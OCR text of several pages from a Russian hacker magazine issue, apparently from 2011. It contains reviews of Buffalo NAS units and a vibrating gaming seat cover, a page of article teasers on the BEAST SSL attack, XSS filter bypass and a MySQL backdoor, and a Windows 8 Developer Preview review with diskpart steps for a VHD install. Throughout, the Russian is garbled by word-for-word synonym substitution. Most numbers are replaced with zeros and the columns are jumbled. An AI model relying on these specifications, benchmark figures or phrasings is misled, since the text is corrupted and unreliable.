коммуникаторы, позволяется выудить приступ для хранимому контенту

почти что изо кто хочешь точки Земли, идеже кушать связь.

020

Интерфейс диска : 0 х SATA-11 Объем : 0, 0, 0 Т б Поддерживаемые уровни RAID: О, 0 равным образом Standaгd Интерфейсы : Etheгnet

00/100/1000 Mbps, 0 х USB 0.0 Поддерживаемые

протоколы: SMB/CIFS, AFP, FTP/FTPS, SFTP, НТТР, НТТРS IWebдccess], NTP, КегЬегоs Потребляемая мощность:

06 Вт Габариты: Вес: 0.3 кг

06 х 004 х 027 мм

ХАКЕР 01/154/2011

0


ЛИНЕЙКА: BUFFALO

LINKSTATION PRO DUO е рсия Рго

Duo является усовершенствованием Duo. Начнем не без; того , в чем дело? девайс способен выдавать факты со скоростью по 04 М байт/с, ведь есть почти 000 М бит/с, что такое? отлично задействует гигабитный интер­ Liпkstatioп

Интерфейс диска :

0 х SATA-11

Объем : 0, 0, 0 ТБ nоддерживаемые уровни RAID: О, 0 равным образом Standaгd Интерфейсы: Etheгnet

фейс равным образом пригоди тся во реальной жизни, разве тебе понадобится срочно сли ть огром н ую базу данных иначе десяток BDRip'oв.

00/100/1000 Mbps, 0 х USB 0.0

М аксимал ьным объемом данных во

nоддерживаемые

диться наравне сердце п ожелает : произвести одну папку, победить возьми

протоколы: SMB/CIFS, AFP, FTP, НТТР, HПPSIWebAc­ cessl, NTP, КегЬегоs nотребляемая мощность: 07

диски да ра здать на нос пользователю alias общий влить

девай из на землевладение да вверить управле н ие политиками безопас­ ности серверу. В любом случае, д евайс одинаково мирово

024 Вт Мах Габариты : Вес: 0.7 кг

0 терабайт не грех распоря­

хорош мучиться равно забавлять тиши утнапиштим равно низким энер г по части п отребле­

06 х 004 х 027 мм

нием- впредь до

04 Ватт.

LINKSTATION PRO QUAD отрать монета неотложно для сей девай с, забей его четырьмя ди ска ми сообразно

0 Тб равно забудьте сверху пяток планирование что касается

фразе «не хватает дискового пространства >>.

Просто прикинь , что-то во твоем распоряжении окажется терабайт, гигабитный интерфейс,

0 х SATA-11 Объем : 0, 0, 02 Т б nоддерживаемые уровни Интерфейс диска :

02

DLNA да UРпР-сервер,

RAID: О, 0, 0, 00 да JBOD

торрент-клиент, iTuпes-cepвep да что-нибудь-еще-что-так­

Интерфейсы: Et heгnet

нужно-пользователям. Компактный кубик предоставля е т

00/ 000/1000 Mbps, 0 х USB 0.0

проход для файлам на деле соответственно любому файловому пр о­

nоддерживаемые

протоколы:

токолу, который-нибудь может присутствовать использован на наше время. Пр да

CIFS, AFP,

потребляемой мо щн ости, срав н имой от парой энергосбере га ю­ щи х ламп, некто горазд основать RАID-массив уровня О, и

AppleTalk, SMB/ NTP,

FТР, НТТР,

КегЬегоs Потребляемая мощность: Вт Габариты: 049 х 033 х 054 мм Вес : 0.5 кг

0, 0, 00

03

JBOD. Остается только лишь отвести ко путы да настроить вследствие

wе Ь-интерфейс, а тогда олигодон качать- малограмотный пере качать.

LINKSTATION MINI почему бы неграмотный совершить быстроходный равно сомкнутый NAS ?>>, п одумали инженеры из дисков форм-фактора Интерфейс диска :

0 х SATA-11

Объем: 0, 0 Тб nоддерживаемые уровни

RAID: О, 0, JBOD

Buffalo да создали аккумулятор получи базе 2,5 дюйма . Этот тенетный н акопитель

чем-то напоминает тостер: маленький, живописный равным образом по временам жужжит. Н что до работает некто в этакий мере тихо, аюшки? ночной порой во комнате его не запрещается равно неграмотный

заметить, а постоянно потому, что-нибудь компактные диски позволили быть

Интерфейсы: Etheгnet

минус дополнительной системы охлаждения. Зато сие полновесный

00/100/1000 Mbps, 0 х USB 0.0

NAS от поддержкой всех нужных протоколов, сервером iTuпes, DLNA

nоддерживаемые

:АррlеТа l k,

да ВitТоггепt-клиентом. Управле ни е, равно как равно у большинства устройств,

CIFS, AFP,

осуществляется чер ез пр ос праздник wеЬ-и нт ерфейс. П отребляет некто

FТР, НТТР,

SMB/ LDAP

nотребляемая мощность:

07 Вт Габариты: Вес : 0.5 кг

02 х 00 х 035 мм

чрезвычайно мало, а весит е щ е меньше- только п олкило, наравне заряжание ото

какого-нибудь ноутбука. Ты може шь отобрать девайс со белым или черным корпусом да уместить его держи самом видном месте- пусть все гадают, аюшки? сие такое.

ХАКЕР

01/154/2011

021


FERRUM

Сергиян Ме л ь ни для ов

ОБЗОР ВИБРОНАК ИДКИ Тр убка

05,

GAM ETRIX TRUE LIVE SENSE

глаза

020.

Бац, бац, равно мимоl Что,

неграмотный хватае т реалистичности на любимой игре? Ощущения отнюдь не те? Нет тряски ото взрывов,

Материал : ткань/кожзам Количество вибромоторов :

0

И нтерфейс : USB, 0.5 мм аудио Ко м пл е кт жернов для равно : накидка, блок питания, провода USB

безвыгодный шумит лещадь натруженными ягодицами

Почему на начале статьи однова г овор после ш ел именно в рассуждении танках? Д а поелику ась? н аки д ка паче

указатель родного танка. На одних колонках

на сей работает из русской онлайн-игрой Woгld

ну да 0D-картинке вдалеке безграмотный уедешь, реализ-

of Tanks !тематика Второй мировой]- WoT на­

ма во зрелище сии технологии добавляют, хотя никак не

тивно поддерживает вибронакидку. Ввиду сего

настолько, с тем проникнуться процессом.

мозетта попала ко ми во растопырки за единый вздох же, во вкусе

Вибрирующие джойстики оставим казуалам­

прие ха ла во редакцию- сказалось конек

реальный танкист управляет машиной ис­

бронетехникой равно вышеу п омя н у т ой игрой.

ключительно рядом помо щ да клавиатуры равно мыши.

В ходе тестирова н ия под было смутил

д в надежде ощущения через боев были приближены

единолично момент- у Gametгix Тгuе

ко боевым, рекомендуем тебе заиметь оченно

предо усмот рены специальные ремешки ради на­

необычный девайс- вибронакидку Gametгix

дежного крепления ко классическому компью­

Тгuе

терном у креслу, все мое домашнее мебель

live sense.

С одной стороны всегда понятно: пред нами

live sense

положительно безграмотный является компьютерным. Кресло

накидка, да симпатия вибрирует. С другой, непо­

в качестве кого кресло, же равным образом возьми нем надбавка д ержалась

нятно- на правах вибрирует, куда-нибудь вибрирует ?

весть надежно.

Все бог просто- Gametгi x являет собой прокладку в лоне

...

нет, невыгодный сиденьем равным образом рулем,

а посреди компьютерным креслом и, собствен­

Простая да быстрая усик тановка драйверов, за­ пуск игры, во которой механически включились

нужные настройки , бой. Авторитетно скажу­

но, игроком. Обшита набивка либо тканью

хламида Gametгix, конечно, д алека ото реальных

!вариант подешевле], либо кожзамом lпре­

ощущений на танке . Но, тем н е ме н ее, эт что до един­

зентабельней] . Внутри но установлены цифра

ственное да лучшее приговор ради того, дай тебе

вибромоторов- что на мобильнике, лишь

услыхать себя механиком-водителем. При

стократ вяще равно мощней. Часть расположена

езде пятистишие надбавка тихонько вибрирует. При

во районе спины, часть- на районе пятой точки.

стрельбе другими словами согласно п адании снаряда на резервуар проис­

Собственно, сие равным образом лакомиться таково называемая <<об­

ходит виброудар.

ратная связь>>- держи манер виброджойстиков. Только действует серия иначе. К компьютеру надбавка подключается двумя способами -либо согласно

022

возле жела нии позволено вытрясти себя всю тазобе­ дренн ую часть.

USB, либо после аудио­

Вибра ц ия н е постоян н а да подле движении как бы перетекает ото поясницы вверху равным образом молоко н о. К вибрации бегом привыкаешь равно перестаешь ее отмечать - казалось бы, порок . Однако

разъем. В первом случае вибрацией управляют

Gametгix выполняет бог полезную функцию­

драйвера да самочки игра, умереть и безвыгодный встать втором проис хо дит

малограмотный даеттелу затекать. Как всего-навсего отключаешь

простая просачивание низких частот. Грубо

накидку, зараз пенис ивляе ш ься, во вкусе далеко не п риятно

говоря, вибрирование включается на играх да музыке

получается выступать лишенный чего виб р ации. П ривыкаешь, равно

с басов !хитрая идея- усаживать бери место

отпираться малограмотный неймется . Хорошо, в чем дело? да достоинство бери

девушек равно заключать в себе Satisfaction]. С nомощью

накидку Gametгix беда небольшая. Несовер­

комплектного регулятора силу вибрации позволено

шеннолетние танкисты будут рады. Совершен­

подкорректировать- мощь моторов такова , почто

нолетние - тем больше . :Х:

ХАКЕР

01/154/2011


Preview

02 страницы журнала получи и распишись одной полосе. PC_ZONE да ВЗЛОМА .

Тизер некоторых статей изо

взламывание

ЗВЕРСКИЙ УГОН SSL-KYKИCOB Е ще на 0004 году Грегори В. Бард подробно рассказал относительно фундаментальной уязви­ мости во для токолах SS L З.O равно TLS 0.0. Но так как бы во его работе было пропасть д о­

D

известные байты , добавленные браузером

D

известные байты, которыми управляет злодей

размер блока=

0

неизвестные байты, которые злоумышл е нник хочет распутывать

п у щ е н ий, найде нн ая бре шьдол г ое во р емя оставалась в полную силу теоре т ической. П ереве ­

межа блока

от т равно ее на вид прагматично реализуемых лишь как-то посчастливилось аргентинским

0

хакерам. Написанная имиутилита менее нежели ради

BEAST 2 минуты расшифровавала

tp

IAIAt AIAIAIAI

0

грань блока

секре т ную кукисус ан дентификаци­ онной сессией

грань блока

PayPal, п ере данную по мнению

защищенному соедине н ию. Учитывая, ч ведь относительная ресурсов по-прежнему используетстарые версии протоколов равно

у~- - ·~

малограмотный поддерживает их новые версии, легко можно пре д наставлять , сколько стоит ш ума н а­ делала каста атака.

PCZONE

WINDOWS 0: ЧТО НОВОГО Компания Microsoft продолжает обмениваться

SUBLIMEТEXT 0, ИЛИ КУНГ- ФУ КОДИНГ

00

Какимдолжен бытьправильный вычитчик

OX,SSЗ- I NTERCEPTER

06

Созда тельубойного снифера перед Windows

наработкаминовыхОСза долгодоих

ко да? У создателей этой программы собственный

рассказал нам по отношению новыхтехниках МIТМ­

релиза. Черновик буду щей Wiпdows8 нас

взгл зооцид сверху этотсчет, кто пришелся в области

атак, на томище числедля перехвата танцевальный шаг ролей,

кое-где подкупающе удивил.

вкусу программи со та м в области всему миру.

которыедолжны сообщаться пoSS L .

IFRАМЕ:ЗАЩИТА И НАПАДЕНИЕ Напальцахразбираемся,каксвязаны

XSS: КРОСС-САЙТИМ НА ПОЛНУЮ 1О способов обхода по мнению п уляр н ых филь­

междусобой понятки

тровХSS-уяэвимостей,6 п рин ц ипов

взламывание

• ХАКЕР

БЭКДОРВБД

Интересный концепттого, в качестве кого из помо щ ью стандартной функциональности

MySQL

дозволительно прекратить лазейку во системе, кото­

рую безвыгодный ввек несомненно обнаружить.

01 / 054/2011

iframe, траф равно за­

грузки. Откуда берется равно что монетизиру­

работы со ними,

ется движение ?

вания.

0 способа использо­

023


В

Microsoft,

похоже, решили

воспроизвести сценарий, успешно

оттренированный на сделали раннюю

dows 0 доступной

Windows 0, и сборку Winдля установки

WINDOWS 0 И Горячие фоно

Windows8: bjЦy/mXPxyQ Патч, отключающий

oper Preview

своими руками.

самое важное, ась? произо шл что касается на новой системе,- сие появление нового интерфейса Меtго

bjЦy/nNzaN8

равным образом оптимизированного чтобы управления со через сенсорного экрана.

Ul,

отнюдь не имеющего шиш общего со прежним,

Новшество пущай равно радикальное, да с целью нас в эту пору невыгодный из толь полез­ ное. Перед командой разработчиков равно дизайнеров целесообразно непростая

вслед за дом : произвести перекидывание среди простым Меtго-интерфейсом

собой, тута но решили ощупать

Windows 0 Devel-

-Microsoft серьезно решила сделать Windows болт обной системой с целью планшетных устройств. Поэтому

MetroUI:

по всем статьям желающим. Мы, само

нововведения

ПЛАНШЕТЫ

Главное , умереть и безвыгодный встать в чем дело? желательно поверить,

Горячие фоно

Windows8: blЦy/mXPxyQ Патч , отключающий

Metro Ul: bjЦy/nNzaN8

равно традиционным рабочим столом

Windows как бы дозволяется побольше легким да

незаметным. Все сие подчинено одной цели: так чтобы новую ОС можно было проэксплуатировать равно там, равным образом з -де сь. И бери десктопных компьютерах,

да сверху ноутбуках, да в настоящий момент смотри планшет ах. На последних, для слову,

Windows 0 поуже работает. Н а конференции BUILD, идеже представляли Developeг Pгeview, были показаны усишко тр ойст ва, базирующиеся на процессаре

Control Panel

Personalize

ARM.

METRO Ul Новый интерфейс

Metro Ul- первое,

почто твоя милость гляди около загрузке

системы . И сие дух нововведение, признаться, пеначалу пугает. После загрузки твоя милость вот далеко не привычные иконки рабочего стола, а Users

пестрые кусок пон енты равно виджеты нового

Wiгeless

брат-близнец нап оминает интерфейс

Home Sсгееп'а, каковой как Windows Phone . Если бы твоя милость

работал получи и распишись планшет е, спокойно было бы вместе с краллить полоску от компо­ Notifications Privacy

-

General

нентами вправо-влево . Компоненты, в качестве кого правило, представляют со­

сражение этикетка к запуска приложения, однако иные могут отображать информацию иначе говоря оповещения, связанные из программой. Они имеют

небо и земля размеры , их дозволительно переносить по образу угодно. Клик в соответствии с любому

подле л ожению !скажем, RSS-аггрегатору новостей! открывает его Search Share Панель уnравления

02~

получи цельный киноискусство !чтобы застлать его равно заставить вернуться обратно, используется клавиша Winl. Все азбука увеличены равным образом максимально заточены nод то, почто взаимодействовать твоя милость из ними будешь пальцем. Короче говоря, получился этакий у голок к планшета. Поль влечение аться бери обычном

ХАКЕР

01/154/2011


Windows 0: аюшки? нового?

Metro Ul

компьютере твоя милость им еле-еле ли будешь. Однако что придется устано вленное

версии

приложение, пользу кого обычного интерфейса или — или Меtго

ста тистика такова, что-то юзеры исnользуют данный штука интерфейса

Ul,

попадет на настоящий

Windows

да вроде пришло ко своему логическому концу. Сейчас

небывалый морда «Staгt». Главное ради нас сейчас, ась? в этом месте но питаться за­

однако реже равным образом реже. Приводится подробная вместе с татистика: инда попросту

мечательный устройство

отмыкать листок во

<< Desktop»,

тот или иной открывает ... обычный

Windows 0 стали

в

01%

меньше, нежели на

Windows

интерфейс Винды. Слава богу:). Двигаемся тогда , благодаря чего в чем дело? Меtго

Vista.

Ul не чета увидеть Youtube'a .

<<Пуске>>, а делают сие во таскбаре. Собственна, финальный теnерь да

своими глазами, пусть себя на здоровье инда в видеоролике со

довольно производить дело инструмента чтобы запуска приложений. А ключ <<Staгt>> хорош разверзать тат самый Меtго

ДЕСКТОПНЫЙ ИНТЕРФЕЙС

Ul,

по отношению котором пишущий сии строки

толькочто говорили.

Итак, пролетарий со взрывчатка никуда никак не делся. Спасать его безграмотный надо. Перейти в традиционный власть позволяется равно объединение хоткею

Поль зователи почти что безграмотный прикреnляют программы во

Win

+М. Но невыгодный спеши нажи­

источник получи кнопку <<S taгt >>, а то сис мотив вновь вернеттебя во Меtго

Ul.

Если нацелить мышкой во ни к черту высший угол, появится новое

меню, из каких мест дозволяется аллегро родить упроще нные настройки !кстати , именно семо вслед за прятали кнопку в целях выключения компьютера­

Все отчего который список << П усК>> во томище понимании , для которому автор до сей времени nри­

бьюсь об заклад, в чем дело? твоя милость будешь ее искать), уnравлять д евайсам и,

выкли, правильнее общей сложности на системе ранее малограмотный будет. В благах

MSDN

расшаривать причина другими словами совершать nоиск . Переработа н приблизительно а

l y/г0SCC4 ) до малейших подробностей рассказывается по отношению часть , на правах во

году впервы е

0992

l http :U Ьit .

появило сь подбор <<Staгl>>, вернувшись возьми смену <<Менеджеру программ >> с

Windows

З.х, оно что изменялось да nерерабаты валось через версии для

Доnолнительное каталог

ХАКЕР

01/154/2011

работа к работы вместе с двумя мониторами . По умолчанию возлюбленный показывает Меtго

Ul

сверху одном дисплее равным образом оперативный харчи получай втором. Если аннексировать

для обеих мониторах привычный десктоп, позволяется видеть, аюшки? на

Новый

Windows

BSOD

025


PCZONE

r-------Vft -tndo~TaskM~a~n~a~g~e~r====~=~~§~~~

БЫСТРЕЕ ИЛИ НЕ БЫСТРЕЕ? Впрочем, первое, получай ась? обращаешь первый план во

Dropbox (32 bit) Google Chrome (32 bit)

Windows 0,- сие

минута загрузки системы. Система грузится стократ быстрее, равным образом это з аметноневооруженным взглядом.

Microsoft

lightscreen (32 bit)

ряд крат заявляла

касательно различных оптимизациях на производительности

Windows 0.

Раз ­

Microsoft Security Client User In ...

работчики рассказывают, в чем дело? им посчастливилось содеять фундаментальные улучшения. Если

равно

02

Мб да

Windows 0 SP1

быть запуске использует поблизости

запущенных процесса , ведь текущая трансформирование

09

Windows 0-

Мб

004

общей сложности

.' PhraseExpress (32 bit)

071

процессов. авеклокеры изо Lifehackeг.com решили проэкзаменовать

благородство сих заявлений

[lifehac.kr/oA2pOPI равно провели несколько i7 0.8 Г Гц от 0 диском получи 0 Тб да видеокартой Nvidia GeFoгce

@

простых тестов возьми хватит хардкорной системе: Саге Гб оперативки , жестким

0800

fndTask

More details

GТ. Результаты представлены во таблице. Упрощенный директор задач

W1ndows 0

Windows 0

Время загрузки

0:10

0:35

Сжатие файла [-700Мбl

0:29

0:32

Распаковка файла

0:11

0:12

Кодирование фильма во Handbгake

0:06

0:15

Запуск

0:46

0:46

0:07

0:07

0470

0455

0

[ -700 Мбl

приложений

Открытие

Результат во

вкладок во Chгome

0dmark10

0

панелька задач перед разлукой отображается далеко не сверху одном мониторе, равно как сие

было раньше, а нате обеих [раньше ваш покорнейший слуга про сего использовал специаль­ ную ту л зу

MultiMonitor TaskBaгl. Плюс для этому теория поддерживает << dual monitor >> ради рабочего стола. Короче говоря, изменения во интерфейсе Windows 0 коснутся далеко не только лишь пользовате­ лей планшетников. К новому интерфейсу Metro ребята изо Microsoft обновили равным образом патронесса святых- сапфировый кино смерти. Он но BSOD. Он же Blue scгeen of death. Все, в чем дело? нынче отображается,- сие грустспециальные шпалеры

ный смайлик равно извещение насчёт том, который на системе возникла проблема,

потому-то нотбук никуда не денешься переместить

:1.

И мелким шрифтом

обозначена архи обтекаемая формулировка проблемы, слыхать

HAL_

INITIALIZATION_FAILED.

НОВЫЙ WINDOWS EXPLORER

Получается , почто самые серьезные оптимизации косн улись

процессазаnуска системы. Он стал на

0.5

раза быстрее [считалось

Серьезно изменился характер многих привычных компонентов системы,

пора с экрана загрузки системы перед появления рабочего стола!.

на частности

Во во всех отношениях остальном особого прироста н е т, так заметь, учитывая по сию пору

получил RiЬЬоп-панель, в духе во

новые получай вороты -хуже никак не стало. Наверное, равно сие важнецки

:1.

Windows

Ехрlогег. Стандартный файловый администратор

Office 0007/ 0011. Для разных типов

файлов во этой панели отображаются соответствующие вкладки. Например , если бы позвать возьми обложка из равно з ображением, в таком случае закачаешься вкладке

<< Manage >> ~ File:

Options

.,,_

o .l.~ lllf3iil

Windows Taslc Manager

0Processes.li Performance 0Арр History 0Startup 0Users 0Dotails 0Servi<:os 0 Proc~

0% CPU

03%

~

тись без участия утилит может статься

0%

0%

Disk

Ndworic

Вackground

пользователя, эдак равным образом админа. Сильно изменилось диалоговое пространство

0.7 МВ

О МВ/s

со которой копируются файлы. Если на нынешний пора выполняет-

OMbps

ся сколько-нибудь операций, в таком случае одну изо них не грех остановить, с намерением

D-

(!] AntimllwAn: Servke: Exec.ut-

0%

07.7МВ

ОМВ/s

OMbps

О.

!!J

0%

0 .6МВ

О МВ/s

OMbps

0%

l l MB

ОМВ/s

OMbps

• (!] Spooler SubSystem дрр

ради копирования / перемещения файлов. Если привнести отображе­ ния деталей, так позволено изведать симпатичную диаграмму равно скорость,

0%

proresses (3)

Microsoft Vlindows Se11rch ·-

Climt Ser-.'8 Runtime: Proc_

конфликтных ситуаций. Система сегодня отображает старые да новые брать файлы чтобы замены было максимально удобно. А ежели предложение идет об изображениях, моментально но показываются равно их превьюшки .

0%

l.OMB

ОМВ/s

OMbps

{!J Client Sttver Runtime Proc-

О%

О.бМВ

ОМВ/s

OMbps

(!] lnsktop Wmdcw M•n1g.er

0%

03.6 МВ

ОМВ/s

OMbps

Г!] НоЯ Proci!Ss fог \Чindows -·

0%

0.9МВ

ОМВ/s

OMbps

f!3

Host Process for Windows -

О%

0 .0МВ

ОМВ/s

OMbps

r!J

Нort Process for Ylindows -

О '\

0.2МВ

ОМВ/s

OMbps

~ Fewerdmils

расстановить приоритеты. Кстати , заметно удобнее стала обработка файлы от одними равным образом теми а именами на виде двух столбцов, дабы вы­

Windows processes (22)

!!J

fndTиk

НОВЫЙ МЕНЕДЖЕР ЗАДАЧ Не самым кардинальным, однако целиком и полностью правильно значимым ново­ введением

Windows 0 стал

026

переработэнный таск-менеджер . Когда

запускаешь его во главнейший раз, опера может чуть удивить. По умолчанию запускается жуть упрощенная модификация менеджера задач,

вместе с через которой единственное, аюшки? равно можно,- сие выгрузить

,

ненужные приложения. Вместо кучи разных вкладок твоя милость увидишь

бесхитростный роспись запущенных nриложений да одинокую кнопку

Task >>. Если

<<End

рыпнуться выгрузить с памяти Меtго-приложение, оно

перейдет во режим Новый таек-менеджер

UltraiSOI. Обновилось равно подбор <<File >>. Теперь с

текущей папки допускается впустить командную строку- каксправами

-:-

Applications (1) r. f8 \• tndows Тask M1n•ger

вместе с тупны кнопки интересах монтирования его во виде логического диска или — или

ежедневник возьми болванку [ура, равным образом в целях того равным образом про другого сегодня дозволяется обой­

Holp

'

буд у т изображаться кнопки про выполнения некоторых

основных преобразований . А, ко прототип у, с целью 050-образа б удут до­

<< suspended >> [это происходит потому, зачем такие

приложения малограмотный выполняются на фоновом режиме равным образом невыгодный потребляют

ХАКЕР

01 / 054/ 0011


Windows 0: почто нового?

БЕЗОПАСНАЯ УСТАНОВКА WINDOWS 0 НА ВИРТУАЛЬНЫЙ ЖЕСТКИЙ ДИСК Если твоя милость хочешь за играться от новой системой

Создать да отключить условный жеспсий носитель

сверх ущерба основой ОС, у тебя большей частью очищать два варианта :

0. Виртуализация . Устанавливаясистему под виртуалкой, твоя милость обрекаешь себя получи то,

Укажите расnоложение вир-туального жесткого J»~tcкa в

ась? нести записки и заботы симпатия будет... протяжнее . Даже

комnьютере .

когда платформаподдерживаетаппаратную

Расnоложение :

виртуализацию, средства компьютера будут разделяться междухостовой равно гостевой ОС .

Обзор ...

0:\Virtual Machines\ 0Nin8.vhd

0. Dual-boot. Ничего отнюдь не стоитустановить Windows 0 в компьютер, идеже ранее работает, скажем, <<семерка >> . Главное условие- ин­

сталлить новую ОС держи разобщенный раздел [или

Размер вирl}rального жес11<ого J»~~СКа :

жестковатый диск! . Но вертеться вместе с бутлоадерами и созданием нового раздела неохота. Всегда

Формат вир-туального жесткого J»~tcкa

поглощать вероятность, чтоэкспериментпревра­

~ ~намическое продолжение

тится на много крови.

С появлением

Размер сего виртуального жесткого J»~~СКа расширяется JJf)

Windows 0 существует покамест

фИксированного максимального размера

одиночный вариант. Установить систему бери вирту­

нения нате нем

альный строгий диск- VHD IViгtual Нагd Drive

Filesl . Система видит такие файлы по образу находя­ щие от ваш покорнейший слуга получай самом обычном диске, и так получи самом

ых. П

no мере

лении

Создание виртуального жесткого диска

деле они живут в середине .vhd-файла. Получается, что надзвездный вариант- доставить систему получи и распишись

То а самое дозволено совершить помощью <<Управле­

что-то сие атомный расклад, вследствие этого что, когда

этакий возможный негибкий дискетка равным образом заниматься держи

ние компьютером >> . Надо отобрать на дереве:

сходный искусство спроворить вместе с <<семер­

своем основном компьютере, далеко не рискуя уложить

<< Запоминающие устройства

совершенно основную систему. Так равно сделаем.

дисками >>, спустя некоторое время разблюдник << Действие

0.

-7

Управления

-7

каковой >>, придется особо мастурбировать

Соз­

из загрузчиком , с целью тотувидел систему возьми

передать возможный жестковатый дискета >> . Главное

VНО-диске. Тутустановщик безвыездно ес сам.

Нам понадобится беда сколько свободного места,

избрать динамический субчик виртуального

Мелочь, а мягко

с намерением создатьжесткий диск. Скажем ,

диска.

00 Гб .

Справедливости из-за есть расчет заявить , ась?

Если будетсильно меньше, так прости-прощай соглашаться ко про­

блемам небось неожиданного

BSOD.

:1.

0.

0. Для установки нам понадобятся образ Windows 0 Developer Preview. Мы в духе в большинстве случаев

Далее загружаемся вместе с нашей флешки, равно т у т

дозволительно равным образом решительно привыкать без участия флеwки alias за­

стержневой видный момент. Необходимо вы­

грузочного

захватывать система инсталляции

<< Custom >>, по-другому

DVD . Идея такая: 1. Создать VНО-диск; 2. Скопировать сверху него совершенно содержание устано­

можем поставить его не без; загрузочногодиска

цветоустановщик снесеттвою основн у ю систему .

иначе флешки. Мне нравится следующий вариант,

Я тебе предупредил. Далее нижеуказанный

тем побольше в чем дело? всю работу до переносу файлов

знаменательный момент. Установщик предложит

с образа держи флешку равно настройку в ней за­

тебе найти раздел ради установки системы.

восстановления lno клавише FBI да взойти на

грузчикавозьметнасебяофициальнаяутили­

Так вот- отнюдь не желательно ни плошки выбирать! Надо

существующую систему. Нам нужно примон­

та с Microsoft- Windows 0 USB/DVD download

выявить ферма [Shift + F1 Ol , включить

тировать свой

tooii Ьit.ly/пYylp9l.

утилиту

новщик. Делаем зто снова а путем облигация равным образом

0. Далее нужно разработать кажущийся строгий

diskpart равно примонтировать давеча

вочного образа.

0.

Перезагрузить компьютер, уместиться во микроконсоль

учреждённый VНО-контейнер:

diskpart:

DISKPART> select vdisk file="d:\Virtual Machines\Win8.vhd" DISKPART> attach vdisk

Win8.vhd

VHD равным образом шибануть от того места уста­

прослойка , для тот или другой наша сестра будем реализовывать уста­ новку. Для сего открываем выступ ото имени администратора равно запускаем утилиту diskpaгt:

DISKPART> select vdisk file=d : \VMs\ DISKPART> attach vdisk

C~\Windows\system32>diskpart

Далее переключаемся до

Microsoft DiskPart версии 0.1.7601 На компьютере: THISISSTATION

<ALT-TAB> вспять

Перед выполнением команды не чета запу­

ко выбору раздела интересах установки равно обновляем

стить какую-нибудь программу [например,

список. Теперь твоя милость приходится заметить раздел, у которого бросьте надлежащий нам размер. Мастерустановкипредупредиттебя,что

DISKPART> create vdisk file="d:\Virtual Machines\Win8.vhd" type=expandaЫe maximum=60000

далеко не сможет поставить систему нате таковой винчестер .

Врет зараза! Просто для жмиОКипродолжай установку.

notepadl да убедиться, ась? буквы дисков не поменялись [например , d: далеко не стал f:l. 4. Теперь дозволено шибать установщик: f:\setup. Здесь !:-буква примонтированного VHD . 5. Чтобы безграмотный уложить целиком и полностью систему, хоть куда вы­ брать вид установки <<Custom >>. Благо­ даря этому, наша сестра сможем прибрать раздел , бери

После окончания установки равным образом перезагрузки

кой полноте реализоваться установка.

твоя милость увидишь абсолютно свежий графиче­

Надо ли говорить, почто сим разделом приходится

Файл виртуального диска успешно

ский бутлоадер не без; новым злементом список

являться отечественный VHD? :1

создан от через программы

ради выбора wскать систему! Надо заметить ,

Завершено (в процентах):

ХАКЕР

01 / 054/ 0011

000

DiskPart.

0.

027


PCZONE в менеджере задач пока что планирование червон назад, хотя появилась сейчас- равно

ВОЗМОЖНОСТИ ДЛЯ ПРОГРАММИСТОВ

сие сделано важно . В самом деле, во всякое время было понятно, сколько осуществимость

спрятать лишек изо списка приложений, которые запускаются совместно с системой, должна присутствовать напрямик во менеджере задач. И вона свершилось.

Дожили! :] Для создания приложений на Windows 0 в эту пору

LOCK SCREEN

И СИНХРОНИЗАЦИЯ

дозволяется эксплуатнуть конец неожиданные варианты : например,

Новый lосk-скрин стократ интереснее своего унылого предше­

HTML5 + Javascript. Но ась? сызнова сильнее важно- сие появление WinRT- своего рода замены устаревшей закачаешься многих отношениях Win32. Он предоставляет с лица недавний API на множества функций, которые впереди представлял лишь только Win32 API. Его нельзя полагать вроде замену Win32, только кардинально дозволено подсчитывать

ственника. На красивой картинке разбросаны виджеты не без; полезной

альтернативой. Особенности:

модифицирование входа во систему-<< nараль изо картинки » . Идея на том, дай тебе

информацией чаятельно текущего времени равно количества непрочитанных сообщений. Опять безграмотный обошлось не принимая во внимание заточенности подо планшетни-

ки: так чтобы заблокировать систему, должен пролистнуть экран вверх. Помимо обычного ввода пароля, принимать хватит интересный

Реализует свежий интерфейс Metro;

неграмотный включать символьный

Имеет простую трафарет создания Ul для того разработчиков lне

последовательности оказать давление возьми чинно определенные ее части.

PIN, а, смотря для картинку, во правильной

нужно свыше заднем проходе на правах не без; Win32];

Надо ли говорить, про а сие может понадобиться? :] Для входа на

Все API разработаны что асинхронные;

систему пока что позволено пускать в ход

API выполняются на SandBox'e !поэтому произведение из помощью WinRT низкоуровневых программ, скажем, к разметки

ста. Если позаниматься во настройках, не дозволяется отнюдь не запоминать раздел <<Sync

диска, хорош проблематично].

стройки не без; другими девайсами

•'

Home

РС Settings ». Это новая фича, позволяющая хронировать на­

Windows 0, используя аккаунт Windows Live 00. Чтобы владеть похожие настройки для разных компьютерах, достаточно эксплуатнуть для того входа безраздельно равным образом оный но аккаунт Windows Live. Заметь, в чем дело? достижимость входа в области обычным, так очищать локальным

Temp Share

Windows Live 00, равно сие неспро­

Dosc

View

lm ag ~

Tools

Acttons

учеткам, сохранилась. Помимо настроек вследствие нимбус могут быть синхронизированы как и адресная книга, фотографии, материал с

SkyDrive .

БОНУСЫНАПОСЛЕДОК Сценарий, когда-когда смелым пользователям предлагается соответственно выступать с новой системой да стороной сработать получи то, что такое? хорош реализовано на

релизе, аспидски радует. Очевидно, ась? на Windows 0 сохранится преем­

it l

ственность, хотя появятся равным образом новые кардинальные функции . Уже не откладывая

• Computer • Local Oisk (С:) • Т emp

изменений баста много, равно сие аж безвыгодный бета-версия. Напоследок хочу перебрать есть такие прочие бонусы, касательно которых моя персона малограмотный расска­

Name

[L test Librari es

0 Oocuments Jt Music .!!!!] Pictures Videos Доработки проводника

комната во рамках материала:

В Metro Ul сделано доступна иконка магазина приложений. Кажется, Microsoft есть его самым последним. Да да так WindowsApp Store пока никак не работает на DeveloperPreview. Но если магазин, наконец, ста­ нетдоступным,черезнегоможнобудетпокупатькакприложениядля

планшетников, в такой мере равно традиционные десктопные программы. Чтобы попастьвкаталогприложений,нужнобытьподписчиком. Проверкаорфографиитеперьработаетповсейсистем~неэависимо

отприложенияlда-да,радиэтогоприходилосьустанавливатьдопол­ нительныеутилиты]. Другая интересная фича- Refresh Your РС -позволяет вернуть системувизначальноесостояниепонажатиюоднойкнопки.Неужели большенепридетсяпереустанавливатьсистему?Интересн~чтомож­

ресурсы]. Есть равно полновесный таск-менеджер. Нажав в кнопку

нонетольковернутьсяксостояниюпослеустановки,ноиустановить

«Маге details>>, твоя милость увидишь белоголовый добродетельный директор задач, который,

порядком геfгеsh-точек-своеобразных образов, которые позволено

